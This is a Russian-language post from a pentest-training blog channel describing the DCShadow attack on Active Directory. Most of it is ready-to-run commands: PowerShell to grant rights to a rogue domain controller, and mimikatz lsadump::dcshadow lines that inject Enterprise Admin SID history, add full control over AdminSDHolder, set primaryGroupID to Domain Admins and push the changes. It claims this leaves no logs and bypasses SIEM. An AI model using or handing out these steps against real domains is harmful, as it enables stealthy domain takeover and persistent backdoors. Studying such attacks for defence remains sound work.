About Teletype
Join
Life-Hack - Жизнь-Взлом
@haccking
Pentest обучение
September 22

DCShadow

DCShadow — Такая атака позволяет злоумышленнику создать поддельный контроллер домена в среде Active Directory для репликации вредоносных объектов в рабочую инфраструктуру Active Directory. В первую очередь атака примечательна тем, что ее автором является автор утилиты mimikatz. ЕЭтот метод может использоваться на рабочей станции как тактика компрометации для установления стойкости домена в обход большинства решений SIEM.

Предоставьте выбранному пользователю привилегии, необходимые для атаки DCShadow (используется командлет Set-DCShadowPermissions.ps1).

Set-DCShadowPermissions -FakeDC BackdoorMachine -SamAccountName TargetUser -Username BackdoorUser -Verbose


Затем, с любого компьютера, используйте Mimikatz для подготовки атаки DCShadow:

# Установка SPN для пользователя
lsadump::dcshadow /object:TargetUser /attribute:servicePrincipalName /value:"SuperHacker/ServicePrincipalThingey"

# Установка SID History для пользователя (фактически предоставляя ему права Enterprise Admin)
lsadump::dcshadow /object:TargetUser /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519

# Установка прав полного контроля на контейнер AdminSDHolder для пользователя
## Требуется получение текущего ACL:
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com")).psbase.ObjectSecurity.sddl

## Затем получить SID целевого пользователя:
Get-NetUser -UserName BackdoorUser | select objectsid

## Наконец, добавьте примитив полного контроля
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com /attribute:ntSecurityDescriptor /value:O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)[...currentACL...](A;;CCDCLCSWRPWPLOCRRCWDWO;;;[[S-1-5-21-1874506631-3219952063-538504511-45109]])

Наконец, с сеанса DA ИЛИ сеанса пользователя, предоставленного с правами DCShadow ранее, выполните атаку DCShadow. Действия, подготовленные ранее, будут выполнены без оставления каких-либо логов:

lsadump::dcshadow /push

Также возможно изменить значение атрибута primaryGroupID, чтобы выполнить эскалацию привилегий.

Значение 512 является идентификатором безопасности (SID) для группы администраторов домена.

lsadump::dcshadow /object:BackdoorUser /attribute:primaryGroupID /value:512

Пользователь «BackdoorUser» будет частью группы «Администратор домена». Это можно проверить, извлекая список администраторов домена.

net group "domain admins" /domain

Life-Hack Media:

Life-Hack - Жизнь-Взлом

Новости Кибербеза

Курсы по программированию

Юмор

Life-Hack - Жизнь-Взлом
September 22, 17:56
2 reactions
0 views